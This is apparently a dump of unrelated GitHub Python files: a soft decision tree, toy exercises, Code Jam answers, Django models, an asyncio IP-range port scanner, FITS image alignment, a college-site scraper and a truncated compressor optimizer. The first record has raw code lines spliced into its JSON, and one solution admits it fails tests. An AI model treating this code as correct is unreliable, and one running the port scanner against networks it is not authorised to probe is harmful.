self.leaf_num) \n\n return mu, _penalty # mu contains the path probability for each leaf \n \n \"\"\" Calculate penalty term for inner-nodes in different layer \"\"\"\n def _cal_penalty(self, 
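# Hedged usage sketch for the SDT class being defined here; the arg keys are the
# ones the class reads, the values are illustrative (flattened 28x28 inputs,
# 10 classes), not taken from the original repo:
import torch
args = {"cuda": False, "depth": 3, "lamda": 1e-3, "beta": True,
        "input_dim": 28 * 28, "output_dim": 10, "lr": 1e-3,
        "weight_decay": 5e-4, "exp_scheduler_gamma": 0.95,
        "greatest_path_probability": True}
tree = SDT(args)
x = torch.randn(32, 28 * 28)
prediction, output, penalty, weights = tree(x)  # log-probs, avg. distribution, regularizer, node weights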
layer_idx, _mu, _path_prob):\n        penalty = torch.tensor(0.).to(self.device) \n        batch_size = _mu.size()[0]\n        _mu = _mu.view(batch_size, 2**layer_idx)\n        _path_prob = _path_prob.view(batch_size, 2**(layer_idx+1))\n        for node in range(0, 2**(layer_idx+1)):\n            numerical_bound = 1e-7 # prevent numerical issue\n            alpha = torch.sum(_path_prob[:, node]*_mu[:,node//2], dim=0) / (torch.sum(_mu[:,node//2], dim=0) + numerical_bound) # not dividing 0.\n            origin_alpha=alpha\n            # if alpha ==1 or alpha == 0, log will cause numerical problem, so alpha should be bounded\n            alpha = torch.clamp(alpha, numerical_bound, 1-numerical_bound) # no log(negative value)\n            # debug aid: warn when the pre-clamp alpha has gone non-finite\n            if torch.isnan(origin_alpha):\n                print(origin_alpha, alpha)\n            \n            penalty -= self.penalty_list[layer_idx] * 0.5 * (torch.log(alpha) + torch.log(1-alpha))\n        return penalty\n    \n    \"\"\" Add constant 1 onto the front of each instance, serving as the bias \"\"\"\n    def _data_augment_(self, input):\n        batch_size = input.size()[0]\n        input = input.view(batch_size, -1)\n        bias = torch.ones(batch_size, 1).to(self.device)\n        input = torch.cat((bias, input), 1)\n        return input\n\n    def save_model(self, model_path, id=''):\n        torch.save(self.state_dict(), model_path+id)\n\n    def load_model(self, model_path, id=''):\n        self.load_state_dict(torch.load(model_path+id, map_location='cpu'))\n        self.eval()\n\n","repo_name":"quantumiracle/Popular-RL-Algorithms","sub_path":"SDT/SDT.py","file_name":"SDT.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":880,"dataset":"github-code","pt":"61"}
{"seq_id":"14098557896","text":"import math\n\nX,Y=map(float,input(\"Enter X Y: \").split())\n\ndef withdrawAmount(X):\n    try:\n        X = int(X)\n    except ValueError:\n        print(\"only expected a whole number between 1 and 2000\")\n        exit()\n    if 1 <= X <= 2000:\n        return X\n    else:\n        print(\"wrong input!\")\n        exit()\n\ndef accountBalance(Y):\n    try:\n        Y = float(Y)\n    except ValueError:\n        print(\"only expected a number between 1 and 2000\")\n        exit()\n    # range() membership is False for non-integer floats; compare numerically\n    if 1 <= Y <= 2000:\n        return Y\n    else:\n        print(\"wrong input!\")\n        exit()\n\n\ndef cashWithdraw():\n    a = withdrawAmount(X)\n    b = accountBalance(Y)\n    if a+0.5 <= b and a % 5 == 0:\n        balance = float(b-a-0.50)\n    else:\n        balance = b\n    return balance\n    \ndef main():\n    balance = cashWithdraw()\n    print(balance)\n\nmain()\n","repo_name":"kykumar688/DSA","sub_path":"atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23566198571","text":"#!/usr/bin/env python\nimport numpy as np\n\ninFile = open('in.txt', 'r')\noutFile = open('out.txt', 'w')\nt = int(inFile.readline())\nfor i in range(1, t+1):\n    N, K = map(int, inFile.readline().split(' '))\n    stage = int(np.ceil(np.log2(K + 1)))\n    done = 2**(stage - 1) - 1\n    remain = N - done\n    peopleRemain = K - done\n    cells = int(float(remain)/(2**(stage - 1)))\n    extra = remain % (2**(stage - 1))\n    if(peopleRemain <= extra):\n        cells += 1\n    left = cells/2\n    right = left\n    if(cells % 2 == 0):\n        right -= 1\n    outFile.write(\"Case #{}: {} {}\\n\".format(i, left, right))\n    # print left, right\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1054.py","file_name":"1054.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"16564959724","text":"# coding=utf-8\n\nfrom django.conf import settings\nfrom 
django.core.validators import MaxValueValidator\nfrom django.db import models\n\n# Create your models here.\n\nclass Estado(models.Model):\n iidestado = models.IntegerField('Id Estado', primary_key=True)\n cdescripcion = models.CharField('Estado',\n db_column='Descripcion',\n max_length=50,\n blank=True,\n null=True)\n\n class Meta(object):\n verbose_name_plural = 'Estados'\n\n def __str__(self):\n return '%s' % self.cdescripcion\n\n\nclass Municipio(models.Model):\n iidestado = models.ForeignKey(Estado)\n iidmunicipio = models.IntegerField('Id Municipio',\n db_column='Id Municipio',\n blank=False,\n null=True)\n cdescripcion = models.CharField('Municipio',\n db_column='Descripcion',\n max_length=50,\n blank=True,\n null=True)\n\n class Meta(object):\n verbose_name_plural = 'Municipios'\n\n def __str__(self):\n return '%s' % self.cdescripcion\n\n\nclass Ubicacion(models.Model):\n iidubicacion = models.AutoField('Id Ubicación',\n primary_key=True)\n iasentamiento = models.IntegerField('Asentamiento',\n blank=True,\n null=True)\n cdescripcion = models.CharField('Descripción',\n db_column='Descripcion',\n max_length=80,\n blank=True,\n null=True)\n icodigopostal = models.IntegerField('Codigo Postal',\n db_column='Codigo Postal',\n blank=True,\n null=True)\n iidmunicipio = models.ForeignKey(Municipio)\n iidestado = models.ForeignKey(Estado)\n\n class Meta(object):\n verbose_name_plural = 'Ubicaciones'\n\n def __str__(self):\n return '%s' % self.cdescripcion","repo_name":"egarnik80/catalogos","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27263372103","text":"# 첫 두 케이스만 정답 처리, 이후에는 오답\n# 왜 그런지 모르겠음\n\ndef main():\n dotNum = int(input())\n dotList = []\n for _ in range(dotNum):\n dot = list(map(int, input().split()))\n dotList.append(dot)\n \n answer = 0\n if dotNum < 3:\n print(0)\n exit()\n \n for i in range(dotNum-2):\n for j in range(1, dotNum-1):\n for k in range(2, dotNum):\n lineL1 = ((dotList[i][0]-dotList[j][0])**2+(dotList[i][1]-dotList[j][1])**2)**(1/2)\n lineL2 = ((dotList[k][0]-dotList[j][0])**2+(dotList[k][1]-dotList[j][1])**2)**(1/2)\n lineL3 = ((dotList[i][0]-dotList[k][0])**2+(dotList[i][1]-dotList[k][1])**2)**(1/2)\n lineLenList = [round(lineL1, 5), round(lineL2, 5), round(lineL3, 5)]\n lineLenList.sort()\n if lineLenList[0]+lineLenList[1] > lineLenList[2]:\n answer += 1\n print(answer)\nif __name__==\"__main__\":\n main()","repo_name":"elice-02-study-01-algorithm/python","sub_path":"CJ_Kim/season1/elice/03/num03.py","file_name":"num03.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"26595498908","text":"import asyncio\nimport socket\nimport struct\nimport typing\n\nfrom network_scanner import utils\nfrom network_scanner.ip_range import IPRange\nfrom network_scanner.port_checker import PortCheckerAsync\n\n\nclass AsyncRangeScanner(PortCheckerAsync):\n def __init__(self, ip_range: typing.Union[IPRange, None], ports: typing.Iterable,\n timeout: int = 3, ip_chunk_size: int = 100,\n port_chunk_size: int = 5, *args, **kwargs):\n super().__init__(ip=None, ports=ports, *args, **kwargs)\n self.ip_range = ip_range\n self.timeout = timeout\n self.ip_chunk_size = ip_chunk_size\n self.port_chunk_size = port_chunk_size\n\n async def check_ports(self, timeout=None, port_chunk_size=5, ip=None):\n ret = []\n for ip_chunk in 
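# The Korean header comment above asks why only the first test cases pass: the
# nested ranges allow j <= i and k <= j, so duplicate and degenerate index
# triples get counted once there are more than three points. Iterating over
# strictly increasing triples fixes it (hedged sketch):
from itertools import combinations

def count_triangles(dots):
    def dist(a, b):
        return ((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2) ** 0.5
    count = 0
    for p, q, r in combinations(dots, 3):
        s = sorted((dist(p, q), dist(q, r), dist(p, r)))
        if s[0] + s[1] > s[2]:
            count += 1
    return count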
utils.chunks(list(range(self.ip_range.start, self.ip_range.end)), self.ip_chunk_size):\n tasks = []\n for ip in ip_chunk:\n task = self.event_loop.create_task(super().check_ports(\n ip=socket.inet_ntoa(struct.pack('!L', ip)),\n timeout=timeout or self.timeout, port_chunk_size=self.port_chunk_size or port_chunk_size\n ))\n tasks.append(task)\n res = await asyncio.gather(*tasks)\n ret.extend(res)\n return ret\n\n\nclass AsyncToSyncRangeScanner(AsyncRangeScanner):\n def check_ports(self, timeout=3, port_chunk_size=5, ip=None):\n task = self.event_loop.create_task(super().check_ports(timeout=timeout,\n port_chunk_size=port_chunk_size,\n ip=ip))\n res = self.event_loop.run_until_complete(asyncio.gather(task))\n return res[0]\n","repo_name":"vitalya420/InternetScanner","sub_path":"network_scanner/range_scanner.py","file_name":"range_scanner.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70508390276","text":"import numpy as np\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy.coordinates import SkyCoord\nimport cv2\nimport re\nimport os\n\nimport utils\nimport const\n\n\ndef align_single(ref_header, band_path):\n ref_wcs = WCS(ref_header)\n ref_ra = ref_header['CRVAL1']\n ref_dec = ref_header['CRVAL2']\n\n band_file = fits.open(band_path)\n band_header = band_file[0].header\n band_data = band_file[0].data\n\n num_rows, num_cols = band_data.shape[:2]\n\n band_ra = band_header['CRVAL1']\n band_dec = band_header['CRVAL2']\n band_skycoord = SkyCoord(band_ra, band_dec, unit='deg')\n\n other_image_pixel_coords = band_skycoord.to_pixel(ref_wcs)\n other_x = other_image_pixel_coords[0]\n other_y = other_image_pixel_coords[1]\n ref_x = ref_header['CRPIX1']\n ref_y = ref_header['CRPIX2']\n x_shift = other_x - ref_x\n y_shift = other_y - ref_y\n\n translation_matrix = np.float32([[1, 0, x_shift], [0, 1, y_shift]])\n img = np.float32(band_data)\n img = cv2.warpAffine(img, translation_matrix, (num_cols, num_rows))\n return img\n\n\ndef align_spectral_bands(list_of_bands):\n sorted_list_of_bands = sorted(list_of_bands) # make sure it is sorted\n if len(sorted_list_of_bands) != 5:\n raise \"number of bands does not equal 5!\"\n\n g, i, r, u, z = tuple(sorted_list_of_bands)\n\n ref_file = fits.open(r)\n ref_header = ref_file[0].header\n ref_wcs = WCS(ref_header)\n ref_data = ref_file[0].data\n\n aligned_g = align_single(ref_header, g)\n aligned_u = align_single(ref_header, u)\n aligned_i = align_single(ref_header, i)\n aligned_z = align_single(ref_header, z)\n\n ref_file.close()\n\n result = np.dstack((aligned_i, ref_data, aligned_g, aligned_u, aligned_z))\n # result = cv2.flip(result, 0) # TODO: should i?\n\n # utils.display_image(result)\n\n return result\n\n\ndef group_bands(fits_files):\n grouping_dict = {}\n for f in fits_files:\n img_id = re.search(const.IMG_ID_REGEX, f).group()\n if img_id in grouping_dict:\n grouping_dict[img_id].append(f)\n else:\n grouping_dict[img_id] = [f]\n return grouping_dict\n\n\ndef align_grouped_bands(grouped_bands, aligned_data_dir):\n # aligning bands of the same image\n for item in grouped_bands.items():\n image_id, bands = item\n aligned_bands = align_spectral_bands(bands)\n\n path = os.path.join(aligned_data_dir, f\"{image_id}\")\n np.save(path, aligned_bands, allow_pickle=True)\n\n\ndef read_fits_files_and_align_them(fits_files_dir, dir_to_save_aligned):\n files = utils.listdir_fullpath(fits_files_dir)\n fits_files = list(filter(lambda f: 
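# The int-to-dotted-quad conversion used by the scanner above, isolated as a
# helper (sketch):
import socket
import struct

def int_to_ip(n):
    return socket.inet_ntoa(struct.pack("!L", n))
# int_to_ip(3232235777) -> "192.168.1.1"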
re.search(\"[0-9]{4}.fits$\", f), files))\n\n grouped_bands = group_bands(fits_files)\n align_grouped_bands(grouped_bands, dir_to_save_aligned)\n\n\ndef main():\n aligned_data_dir = const.ALIGNED_DATA_DIR\n utils.create_dir_if_doesnt_exist(aligned_data_dir)\n\n read_fits_files_and_align_them(const.DATA_DIR, aligned_data_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kkulesz/AMLS_excercise","sub_path":"data_acquistion_and_alignment/align_data.py","file_name":"align_data.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23637913971","text":"def diff(score, p):\r\n if (p == 0):\r\n return 0\r\n if (p >= score):\r\n return 100\r\n if (score / 3 >= p):\r\n return 0\r\n else:\r\n a = (score - p) / 2\r\n return p - a\r\n\r\ndef diff1(score,p):\r\n if (p == 0):\r\n return 0\r\n if (p > score):\r\n return 100\r\n if (score < p * 3 - 4):\r\n return 100\r\n if (score >= p * 3 - 4 and score < p * 3 - 2):\r\n return 2\r\n if (score >= p * 3 -2 and score < p * 3):\r\n return 1\r\n return 0\r\n \r\n\r\ndef num_p(line):\r\n inp = line.split()\r\n N = int(inp[0])\r\n S = int(inp[1])\r\n p = int(inp[2])\r\n count = 0\r\n count_odd = 0\r\n for i in range(3,len(inp)):\r\n d = diff(int(inp[i]), p)\r\n if (d < 2):\r\n count += 1\r\n if (d == 2):\r\n count_odd += 1\r\n \r\n\r\n if (count_odd > S):\r\n count_odd = S\r\n count += count_odd\r\n return count\r\n\r\ndef num_p1(line):\r\n inp = line.split()\r\n N = int(inp[0])\r\n S = int(inp[1])\r\n p = int(inp[2])\r\n count = 0\r\n count_odd = 0\r\n for i in range(3,len(inp)):\r\n d = diff1(int(inp[i]), p)\r\n if (d < 2):\r\n count += 1\r\n if (d == 2):\r\n count_odd += 1\r\n \r\n\r\n if (count_odd > S):\r\n count_odd = S\r\n## if (count_odd != S):\r\n## print \"!!!\", line\r\n count += count_odd\r\n return count\r\n\r\nf = open('C:\\\\B-large.in')\r\nf_out = open('C:\\\\res.txt','r+')\r\nj = 0\r\nn = 0\r\nfor line in f:\r\n if (j == 0):\r\n n = int(line)\r\n j = j + 1\r\n continue\r\n f_out.write(\"Case #\"+str(j)+\": \"+str(num_p1(line))+'\\n')\r\n #print line, num_p(line), num_p1(line)\r\n j = j + 1\r\n\r\n\r\nf.close()\r\nf_out.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/1273.py","file_name":"1273.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4322460375","text":"\n# TODO: clean this import stuff up (breaking up a monolithic script is a pain to refactor)\nfrom .config import CONFIG\nfrom .util import *\nfrom .fields import *\nimport json\n\nclass School:\n def __init__(self, url):\n self.urls =dict()\n self.urls['main'] = url\n self.urls['cost'] = url+ 'cost/'\n self.urls['admissions'] = url+ 'admissions/'\n self.urls['academics'] = url + 'academics/'\n self.urls['fa'] = url + 'scholarships-financial-aid/'\n self.urls['loans'] = url + 'student-loans/'\n self.row = dict(Niche = url)\n print(url)\n self.parse()\n self.compute_fields()\n\n def sum(self, *fields, todol=True):\n res = sum(dol2int(self.row.get(f, '0')) for f in fields)\n if todol:\n return int2dol(res)\n return res\n \n def housing_needed(self):\n if self.row.get('LoC', '') == '100%': \n return True\n if self.row.get('LoC Required', '') == 'Yes':\n return True\n return self.row.get('Miles', 0) > CONFIG.geo.HousingDistance\n\n def is_instate(self):\n return self.row.get('State', '') == CONFIG.geo.HomeState\n \n def 
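# Hedged distillation of the offset computation in align_single above: project
# the band's reference sky coordinate into the reference image's WCS and
# compare it against the reference CRPIX values:
from astropy.coordinates import SkyCoord
from astropy.wcs import WCS

def pixel_shift(ref_header, ra_deg, dec_deg):
    x, y = SkyCoord(ra_deg, dec_deg, unit="deg").to_pixel(WCS(ref_header))
    return x - ref_header["CRPIX1"], y - ref_header["CRPIX2"]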
compute_fields(self):\n self.row['Miles'] = get_miles(self.latitude, self.longitude)\n self.row['Travel'] = get_travel(self.row['Miles'])\n \n self.row['Avg FA $110k+'] = int2dol(dol2int(self.row['Tuition OoS'])-\n dol2int(self.row['$110k+ Net']))\n\n self.row['IS Tot'] = self.sum('Tuition IS','Housing','Meal','Supplies')\n self.row['OoS Tot'] = self.sum('Tuition OoS','Housing','Meal','Supplies')\n self.row['Com Tot'] = self.sum('Tuition IS','Meal','Supplies')\n\n tosum = ['Supplies']\n tt = ''\n if self.is_instate():\n tosum.append('Tuition IS')\n tt+='IS '\n else:\n tosum.append('Tuition OoS')\n tt+='OoS '\n if self.housing_needed():\n tosum.extend(['Housing', 'Meal'])\n if self.sum('Housing', todol=False) == 0:\n tt+='Rent'\n else:\n tt+='Dorm'\n else:\n tt+='Home'\n\n self.row['Total'] = self.sum(*tosum)\n self.row['TBasis'] = tt\n \n self.row['Size'] = get_size(self.sum('Fulltime', 'Parttime', todol=False))\n\n def _parse_main(self, bs):\n \"\"\"\n \"\"\"\n # Name/Name\n self.row['Name'] = bs.h1.contents[0]\n print(self.row['Name'])\n\n # lon/lat\n lon = bs.find('meta', property='place:location:longitude')\n jsd = bs.find_all('script', type='application/ld+json')[-1].text\n self.row['State'] = json.loads(jsd)['address']['addressRegion']\n self.longitude = float(lon.get('content'))\n self.latitude = float(bs.find('meta', property='place:location:latitude').get('content'))\n\n # Urls/[Apply, Visit, School, Info]\n buttons = bs.find_all(class_=\"button\")\n #self.row['Apply'] = buttons[1].get('href') # problem\n #self.row['Visit'] = buttons[2].get('href') # problem\n #self.row['Info'] = buttons[-3].get('href') # problem\n self.row['School'] = bs.find_all(class_=\"profile__website__link\")[0].get('href')\n\n # Ranks/*\n self.row['Overall'] = bs.find(class_=\"overall-grade__niche-grade\").text\n ranks = bs.find_all(class_=\"profile-grade--two\")\n self.row.update({g.contents[0].text: g.contents[1].text for g in ranks})\n\n # Academics/[Fulltime,Parttime]\n students = bs.find(id=\"students\").find_all(class_=\"scalar__value\")\n self.row['Fulltime'] = students[0].contents[0].text\n self.row['Parttime'] = students[1].text\n\n # Academics/[S:T, Evening]\n acc = bs.find(id=\"academics\").find_all(class_=\"scalar__value\")\n self.row['S:T'] = acc[0].text\n self.row['Evening'] = acc[1].text\n \n # Academics/[Grad$, Grad%, Emp%]\n after = bs.find(id=\"after\").find_all(class_=\"scalar__value\")\n self.row['Grad$'] = after[0].contents[0].text\n self.row['Grad%'] = after[1].contents[0].text\n self.row['Emp%'] = after[2].contents[0].text\n \n # Academics/LoC\n loc = bs.find(id=\"campus-life\")\n if loc: loc = loc.find(class_=\"scalar__value\")\n self.row['LoC'] = loc.text if loc else EMDASH\n \n\n def _parse_cost(self, bs):\n \"\"\"\n \"\"\"\n # Aid/FA%\n net = bs.find(id=\"net-price\")\n sv = net.find_all(class_='scalar--three')\n self.row['FA%'] = sv[-1].contents[-1].text.split('/')[0]\n self.row['Avg FA'] = sv[-2].contents[-1].text.split('/')[0]\n\n # Urls/Calc\n self.row['Calc'] = net.find(class_=\"profile__website__link\").get('href')\n\n # Aid/$110k+ Net\n self.row['$110k+ Net'] = net.find_all(class_=\"fact__table__row__value\")[-1].contents[0]\n\n # Cost/[Tuition *, Housing, Meal, Supplies]\n sticker = bs.find(id=\"sticker-price\")\n buckets = sticker.find_all(class_=\"blank__bucket\")\n self.row['Tuition IS'] = buckets[0].find(class_=\"scalar__value\").span.text\n self.row['Tuition OoS'] = buckets[1].find(class_=\"scalar__value\").span.text\n\n vals = 
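# dol2int/int2dol come from the star-import of .util and are not shown in this
# file; a plausible minimal pair consistent with how School.sum uses them
# (hypothetical, not the project's actual implementation):
def dol2int(s):
    digits = "".join(ch for ch in str(s) if ch.isdigit())  # "$12,345" -> "12345"
    return int(digits) if digits else 0

def int2dol(n):
    return "${:,}".format(int(n))  # 12345 -> "$12,345"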
sticker.find_all(class_=\"scalar--three\")\n\n self.row['Housing'] = vals[0].contents[-1].text.split('/')[0]\n self.row['Meal'] = vals[1].contents[-1].text.split('/')[0]\n self.row['Supplies'] = vals[2].contents[-1].text.split('/')[0]\n\n # Aid/[No Increase, Installments, PrePay]\n self.row['No Increase'] = vals[3].contents[-1].text\n self.row['Installments'] = vals[4].contents[-1].text\n self.row['PrePay'] = vals[5].contents[-1].text\n\n def _parse_fa(self, bs):\n \"\"\"\n \"\"\"\n self.row['Aid'] = bs.find(class_='profile__website__link').get('href')\n\n bd = bs.find(id='financial-aid-breakdown').find_all(class_='fact__table__row__value')\n self.row['Fed%'] = bd[0].text\n self.row['Fed$'] = bd[4].text\n self.row['State%'] = bd[1].text\n self.row['State$'] = bd[5].text\n self.row['Inst%'] = bd[2].text\n self.row['Inst$'] = bd[6].text\n self.row['Pel%'] = bd[3].text\n self.row['Pel$'] = bd[7].text\n \n def _parse_loans(self, bs):\n \"\"\"\n \"\"\"\n loans = bs.find(class_='blank__bucket')\n try:\n self.row['Loan$'] = loans.contents[1].find(class_='scalar__value').span.text\n except:\n self.row['Loan$'] = EMDASH\n vals = loans.find_all(class_='scalar--three')\n self.row['Loan%'] = vals[0].contents[-1].text\n self.row['Default%'] = vals[1].contents[1].span.text\n\n\n def _parse_academics(self, bs):\n \"\"\"\n \"\"\"\n # Academics/[Fulltime%, Parttime%, Calendar]\n vals = bs.find_all(class_=\"scalar--three\")\n self.row['Fulltime%'] = vals[0].contents[-1].text\n self.row['Parttime%'] = vals[1].contents[-1].text\n self.row['Calendar'] = vals[2].contents[-1].text\n\n\n def _parse_admissions(self, bs):\n \"\"\"\n \"\"\"\n stats = bs.find(id=\"admissions-statistics\")\n if not stats:\n self.row['Acceptance Rate'] = '100%'\n return\n buckets = stats.find_all(class_=\"blank__bucket\")\n self.row['Acceptance Rate'] = buckets[0].contents[-1].contents[-1].text\n self.row['SAT'] = buckets[2].contents[0].contents[-1].text\n self.row['ACT'] = buckets[3].contents[0].contents[-1].text\n\n vals = stats.find_all(class_=\"scalar--three\")\n self.row['Early Rate'] = vals[0].contents[-1].text\n self.row['Applicants'] = vals[1].contents[-1].text\n self.row['SAT Reading'] = vals[2].contents[-1].text\n self.row['SAT Math'] = vals[3].contents[-1].text\n self.row['SAT%'] = vals[4].contents[-1].text\n self.row['ACT English'] = vals[5].contents[-1].text\n self.row['ACT Math'] = vals[6].contents[-1].text\n self.row['ACT Writing'] = vals[7].contents[-1].text\n self.row['ACT%'] = vals[8].contents[-1].text\n\n dead = bs.find(id=\"admissions-deadlines\")\n buckets = dead.find_all(class_=\"blank__bucket\")\n self.row['Deadline'] = buckets[0].contents[0].contents[-1].text\n self.row['Fee'] = buckets[1].contents[0].contents[-1].text\n\n vals = dead.find_all(class_=\"scalar--three\")\n self.row['Decision Deadline'] = vals[0].contents[-1].text\n self.row['Action Deadline'] = vals[1].contents[-1].text\n\n self.row['Early Decision'] = vals[2].contents[-1].text\n self.row['Early Action'] = vals[3].contents[-1].text\n self.row['Common App'] = vals[4].contents[-1].text\n self.row['Coalition App'] = vals[5].contents[-1].text\n\n try:\n self.row['Apply'] = dead.find(class_='profile__website__link').get('href')\n except:\n pass\n\n vals = bs.find(id=\"admissions-requirements\").find_all(class_=\"fact__table__row__value\")\n self.row['HS GPA'] = vals[0].text\n self.row['HS Rank'] = vals[1].text\n self.row['HS Transcript'] = vals[2].text\n self.row['Col Prep Courses'] = vals[3].text\n self.row['SAT/ACT'] = vals[4].text\n 
self.row['Recomendations'] = vals[5].text\n\n def parse(self):\n \"\"\"\n Parse all the pages into the primary row data.\n \"\"\"\n for page, url in self.urls.items():\n print(url)\n bs = get_page(url)\n if bs is not None:\n getattr(self, '_parse_'+page)(bs)\n\ndef load_schools(cache=False):\n account = get_page('https://www.niche.com/account/', cache)\n if not account:\n return None\n school_urls = [s.a.attrs['href'] for s in account.find_all('span', class_='postcard__title') if s.a]\n nschools = len(school_urls)\n print(f\"Found {nschools} schools to load from Niche account.\")\n return [School(u) for u in school_urls]\n\ndef rotated_rows_iter(schools):\n prefix=['', '']\n cathead = [''] *(len(schools)+1)\n def rotated_row(name):\n row = [s.row.get(name, '') for s in schools]\n row[0:0] = prefix\n return row\n for cat, vals in BREAKDOWN.items():\n yield [cat,] + cathead\n for name in vals:\n prefix[1] = name\n yield rotated_row(name)\n","repo_name":"dougn/niche_scraper","sub_path":"niche_scraper/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13552060192","text":"import numpy as np\r\nimport pandas\r\nimport numpy\r\nfrom . import mean_radius_calculation\r\nfrom . import engine_logging\r\nimport os.path\r\n\r\n\r\ndef get_parabolic_shape_function(x1, x2, x_max, y1, y2, y_max):\r\n LHS_matrix = [[x1**2, x1, 1, 0, 0, 0],\r\n [0, 0, 0, x2**2, x2, 1],\r\n [2 * x_max, 1, 0, 0, 0, 0],\r\n [0, 0, 0, 2 * x_max, 1, 0],\r\n [x_max**2, x_max, 1, 0, 0, 0],\r\n [0, 0, 0, x_max**2, x_max, 1]]\r\n RHS_column = [y1, y2, 0, 0, y_max, y_max]\r\n\r\n result_column = numpy.linalg.solve(LHS_matrix, RHS_column)\r\n left_coef_column = result_column[:3]\r\n right_coef_column = result_column[3:]\r\n\r\n def shape_function(x):\r\n mononom_vector = [x**2, x, 1]\r\n if x <= x_max:\r\n return sum([coef * mononom for coef, mononom in zip(left_coef_column, mononom_vector)])\r\n else:\r\n return sum([coef * mononom for coef, mononom in zip(right_coef_column, mononom_vector)])\r\n\r\n return shape_function\r\n\r\n\r\nclass MeanRadiusCompressorOptimizer:\r\n def __init__(self, compressor_prototype, pi_c, min_eta_ad, precision=0.05):\r\n self.compressor = compressor_prototype\r\n self.non_linear_func_gen = get_parabolic_shape_function\r\n self.compressor_solver = mean_radius_calculation.MeanRadiusCompressorSolver()\r\n self.pi_c = pi_c\r\n self.min_eta_ad = min_eta_ad\r\n self.precision = precision\r\n\r\n self.u_out_1 = list()\r\n self.d_rel_1 = list()\r\n\r\n self.H_t_rel_first = list()\r\n self.H_t_rel_last = list()\r\n self.H_t_rel_max = list()\r\n self.H_t_rel_max_coord = list()\r\n\r\n self.eta_ad_first = list()\r\n self.eta_ad_last = list()\r\n self.eta_ad_max = list()\r\n self.eta_ad_max_coord = list()\r\n\r\n self.c_a_rel_first = list()\r\n self.c_a_rel_last = list()\r\n\r\n self.R_mean_first = list()\r\n self.R_mean_last = list()\r\n\r\n self.inlet_alpha = list()\r\n\r\n def get_total_variant_number(self):\r\n result = 1\r\n result *= len(self.u_out_1)\r\n result *= len(self.d_rel_1)\r\n\r\n result *= len(self.H_t_rel_first)\r\n result *= len(self.H_t_rel_last)\r\n result *= len(self.H_t_rel_max)\r\n result *= len(self.H_t_rel_max_coord)\r\n\r\n result *= len(self.eta_ad_first)\r\n result *= len(self.eta_ad_last)\r\n result *= len(self.eta_ad_max)\r\n result *= len(self.eta_ad_max_coord)\r\n\r\n result *= len(self.c_a_rel_first)\r\n result *= len(self.c_a_rel_last)\r\n\r\n 
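# Sanity check for get_parabolic_shape_function above: the two parabolas share a
# zero-slope vertex at (x_max, y_max) and pass through their endpoint values
# (illustrative numbers; assumes the function is in scope):
f = get_parabolic_shape_function(x1=1, x2=8, x_max=4, y1=0.25, y2=0.30, y_max=0.36)
assert abs(f(1) - 0.25) < 1e-9
assert abs(f(4) - 0.36) < 1e-9
assert abs(f(8) - 0.30) < 1e-9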
result *= len(self.R_mean_first)\r\n result *= len(self.R_mean_last)\r\n\r\n #result *= len(self.inlet_alpha) TODO Разобраться, как раньше проводилась инициализация\r\n\r\n return result\r\n\r\n def _is_fully_initialized(self):\r\n return self.get_total_variant_number() > 0\r\n\r\n @staticmethod\r\n def _get_non_linear_parameter_value_list(parameter_func_gen, parameter_first, parameter_last, parameter_max, stage_num,\r\n parameter_max_coord):\r\n parameter_function = parameter_func_gen(1, stage_num, parameter_max_coord,\r\n parameter_first, parameter_last, parameter_max)\r\n\r\n parameter_value_list = [parameter_function(stage_ind) for stage_ind in range(1, stage_num + 1)]\r\n return parameter_value_list\r\n\r\n @staticmethod\r\n def _get_linear_parameter_list(parameter_first, parameter_last, stage_num):\r\n return np.linspace(parameter_first, parameter_last, stage_num)\r\n\r\n @staticmethod\r\n def _get_H_t_rel_list(H_t_rel_func_gen, H_t_rel_first, H_t_rel_last, H_t_rel_max, stage_num, H_t_rel_max_coord):\r\n return MeanRadiusCompressorOptimizer._get_non_linear_parameter_value_list(H_t_rel_func_gen, H_t_rel_first, H_t_rel_last,\r\n H_t_rel_max, stage_num, H_t_rel_max_coord)\r\n\r\n @staticmethod\r\n def _get_eta_ad_list(eta_ad_func_gen, eta_ad_first, eta_ad_last, eta_ad_max, stage_num, eta_ad_max_coord):\r\n return MeanRadiusCompressorOptimizer._get_non_linear_parameter_value_list(eta_ad_func_gen, eta_ad_first, eta_ad_last,\r\n eta_ad_max, stage_num, eta_ad_max_coord)\r\n\r\n @staticmethod\r\n def _get_c_a_rel_list(c_a_rel_first, c_a_rel_last, stage_num):\r\n return MeanRadiusCompressorOptimizer._get_linear_parameter_list(c_a_rel_first, c_a_rel_last, stage_num)\r\n\r\n @staticmethod\r\n def _get_R_mean_list(R_mean_first, R_mean_last, stage_num):\r\n return MeanRadiusCompressorOptimizer._get_linear_parameter_list(R_mean_first, R_mean_last, stage_num)\r\n\r\n def _get_compressor_model(self, u_out_1, d_rel_1, H_t_rel_first, H_t_rel_last, H_t_rel_max, 